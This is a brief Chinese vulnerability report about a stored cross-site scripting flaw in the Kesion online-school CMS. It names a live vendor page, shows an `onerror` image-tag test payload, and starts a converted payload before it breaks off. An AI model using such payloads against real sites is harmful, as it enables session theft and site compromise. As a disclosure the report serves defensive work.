科讯网校系统xss漏洞(密码为MD5加密)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大CMS厂商。。 http://www.kesion.com/ 已有 469,628 个网站选择KESION产品搭建,今日新增网站 104 个 拿了好多证书。 ### 详细说明: 首先在他们网站 http://e.kesion.com/model/view.aspx?m_id=3&id=4373 我目测只要有回复框就百分百存在这漏洞 而且全站判断的方式一样 为什么这样说呢 往下面看就知道了 http://e.kesion.com/model/view.aspx?m_id=3&id=4373 2014年司法考试历年真题课件-民法 OK 我们当然像二哥说的,不要见框就插,我们先试下,别那么着急插入js `<img src="1" onerror=alert("1")>` 提交看下 [<img src="https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/02233245c3a894a6ea6bd2225eca12165a5dea97.png) 那么知道了。。那么我们用Xss测试字符串转换工具转换下 然后把js转换, 插进去 ``` <img/src=http://www.baidu.com/img/baidu_sylogo1.gif...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息